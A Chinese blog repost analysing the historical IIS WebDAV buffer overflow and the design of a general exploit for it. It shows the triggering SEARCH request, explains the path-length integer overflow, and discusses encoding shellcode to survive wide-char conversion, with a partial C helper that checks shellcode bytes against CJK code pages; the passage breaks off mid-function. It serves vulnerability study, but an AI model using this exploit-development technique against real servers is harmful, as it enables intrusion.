WebDav漏洞简单分析及通用exploit设计

最新推荐文章于 2024-06-21 15:54:14 发布

freexploit

最新推荐文章于 2024-06-21 15:54:14 发布

阅读量2.2k

点赞数

分类专栏：溢出研究经典收藏文章标签： iis byte socket path character buffer

本文链接：https://blog.csdn.net/freexploit/article/details/158206

版权

本文详细介绍了WebDAV溢出漏洞的原理，通过分析IIS处理请求的过程，揭示了漏洞产生的原因。作者探讨了如何利用编码技巧确保shellcode在多种语言环境下的宽字符范围内有效，并分享了自己调试解码代码的经验。文章还包含了用于检测shellcode合法性的C代码示例，以及通用exploit的设计思路。

摘要由CSDN通过智能技术生成

WebDav漏洞简单分析及通用exploit设计

　拜读了isno写的<漏洞分析>>、<<通用的攻击WebDAV漏洞的方法>>，以及Nankia写的
<漏洞ISNO方法的补充>>之后，用他们发布的exploit、以及能在网上找到的exploit在我的一些测试
机上测试，有些成功，有些不成功。于是便想自己调试一下。在后来的调试过程中，参考了大量资料，特别
是yuange所写的<攻击技术>>。在这过程中我学到了很多东西，自己也有些心
得体会，其中可能有不少错误的地方，于是便想写下来，一来请各位高手多多指点，二来可以当做笔记供日
后参考（我记性不好:-)）。

建议各位在阅读了以上提及的文章后再继续往下看。以下测试是在windows 2000 简体中文版本进行的。

-=-=-=- 第一部分漏洞简单分析 -=-=-=-

webdav溢出具体是怎么发生的我就不罗嗦了，请大家参考isno所写的文章，这里只简述一下。我们向
IIS发送如下数据：

SEARCH /O HTTP/1.0
Host:xxx
Content-Type: text/xml
Content-length: 3
xxx

IIS把我们请求的文件名转换成UNICODE，在前面加上路径，然后作为文件名参数传给了
GetFileAttributesExW（先加上路径再转换成UNICODE，还是转换成UNICODE再加路径，我没有仔细看，但这
并不重要）。假如IIS根目录是c:/inetpub/wwwroot，那么传递给GetFileAttributesExW的文件名就是
"//?/c:/inetpub/wwwroot/O"的UNICODE形式，如下：
0197efe0 5c 00 5c 00 3f 00 5c 00-63 00 3a 00 5c 00 69 00 /./.?./.c.:./.i.
0197eff0 6e 00 65 00 74 00 70 00-75 00 62 00 5c 00 77 00 n.e.t.p.u.b./.w.
0197f000 77 00 77 00 72 00 6f 00-6f 00 74 00 5c 00 4f 00 w.w.r.o.o.t./.O.

漏洞引用关系如下:

GetFileAttributesExW
|__RtlDosPathNameToNtPathName_U
|__RtlInitUnicodeString <-buff超过65535就会导致短整型数溢出
|__在这后面的代码进行字符copy的时候就会触发堆栈溢出

我们来看看UNICODE_STRING结构的定义：
typedef struct _UNICODE_STRING
{
USHORT Length; <--这长度指的是buffer的字节数，并不是unicode字符的个数
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING *PUNICODE_STRING;

从上面的分析我们可以看到，事实上只要我们保证($FileName+$IIS_Path)*2 > 65535就可以触发
存储buff长度的短整型数溢出，其中$FileName是我们提交的文件名（非UNICODE形式）。

-=-=-=- 第二部分关于widechar的字符串 -=-=-=-

IIS在接收到我们发送的buff之后，会调用MultiByteToWideChar函数把我们的buff转换成widechar，
即UNICODE，用的CodePage是系统默认的CodePage，在简体中文系统上是936。在转换过程中，不符合
相应code page widechar范围的双字节字符会被替换掉，单字节字符会被转换成"/xXX/x00"的形式。

怎么判断字符是单字节字符还是双字节字符? 简体中文、繁体中文、韩文、日文都是双字节语言，
即double-byte character set (DBCS)。上述四种语言双字节中的第一个字节都大于等于0x80。所以
某个字符如果大于等于0x80的话，那么后面就还有一个字节的字符一起跟这个字符组成一个完整"字符"。

不信的话，可以写程序验证一下，调用一个API就可以了。
The IsDBCSLeadByteEx function determines whether a specified byte is a lead byte
that is, the first byte of a character in a double-byte character set (DBCS).
BOOL IsDBCSLeadByteEx(
UINT CodePage, // identifier of code page
BYTE TestChar // byte to test
);

假如我们发送的字符是"/x61/x81/x81"的话，用简体中文的CodePage经过MultiByteToWideChar函数
转换后就成了"/x61/x00/xXX/xXX"，当然，前提是"/x81/x81"转换成Unicode后符合简体中文的wide
char范围。所以我们要确定shellcode在经过MultiByteToWideChar转换后，符合相应code page的wide
char范围。

反复拜读了yuange的文章<攻击技术>>后，由衷佩服yuange技术之高！
向他致敬！
yuange在他的文章中提出：
(1)把real shellcode编码成可见字符，即小于0x80。这样在经过MultiByteToWideChar转换后就成为
"/xXX/x00"，字符不会被改变。
(2)再精心编写一段符合相应code page widechar范围的代码，用这些代码来解码上述经过编码的
real shellcode。

yuange在那篇文章里面还提供了一段解码shellcode的代码，这些代码符合简体中文WideChar范围。
后来台湾网友Nankia说这些代码在繁体中文上面无法使用，然后Nankia自己又写了个符合繁体中文
widechar范围的解码代码。

后来我花了不少时间，在yuange发布的代码的基础上，修改了一些地方，写了一段符合简体中文、繁体
中文、韩文、日文 widechar范围的解码代码。以下是我测试这些解码代码是否符合相应widechar范围的
c代码。不知yuange和Nankia是怎么调试解码代码的？？

-=-=-=-=-=-=-=-=-=-=-=-=-=-= CheckCode.c -=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-==-=-=-=-=
#include
#include

#define CODE_CN 936// ANSI/OEM - Simplified Chinese (PRC, Singapore)
#define CODE_TW 950// ANSI/OEM - Traditional Chinese (Taiwan; Hong Kong SAR, PRC)
#define CODE_JP 932// ANSI/OEM - Japanese, Shift-JIS
#define CODE_Korean 949// ANSI/OEM - Korean (Unified Hangeul Code)
int g_iCodePageList[]={936,950,932,949};
//如果为合法的wide char范围，则此byte值为1，否则为0
char *g_szWideCharShort;

void checkcode(unsigned char *shellcode,int iLen);
void printsc(unsigned char *sc, int len);
BOOL MakeWideCharList();
void SaveToFile();
void shellcodefnlock();

#define FNENDLONG 0x08

void main()
{
char *fnendstr="/x90/x90/x90/x90/x90/x90/x90/x90/x90";
unsigned char temp;
unsigned char *shellcodefnadd;
unsigned char shellcode[512];
int len,k;

/* 定位　shellcodefnlock的汇编代码　*/
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9)
{
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k)
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0)
break;
/* shellcodefnadd+k+8是得到的shellcodefnlock汇编代码地址 */
len = 2*wcslen(shellcodefnadd+k+8);
memcpy(shellcode,shellcodefnadd+k+8,len);

if(!MakeWideCharList()) return;
//SaveToFile();
/*检测shellcode是否在合法的wide char范围*/
checkcode(shellcode, len);
//printsc(shellcode, len);
}

BOOL MakeWideCharList()
{
unsigned char wbuff[4];
unsigned char wbuff2[4];
unsigned char buff[4];
int i,j,ret,k;

g_szWideCharShort = (char *)malloc(65536);
memset(g_szWideCharShort, 1 , 65536);

for(k=0;k{
printf("UseCodePage=%d/n",g_iCodePageList[k]);
for(i=0;i<256;i++)//for 2
{
for(j=0;j<256;j++)//for 3
{
if((i==0) && (j==0)) j=1;
memset(buff, 0, 4);
memset(wbuff2, 0, 4);
wbuff[0]=(BYTE)i;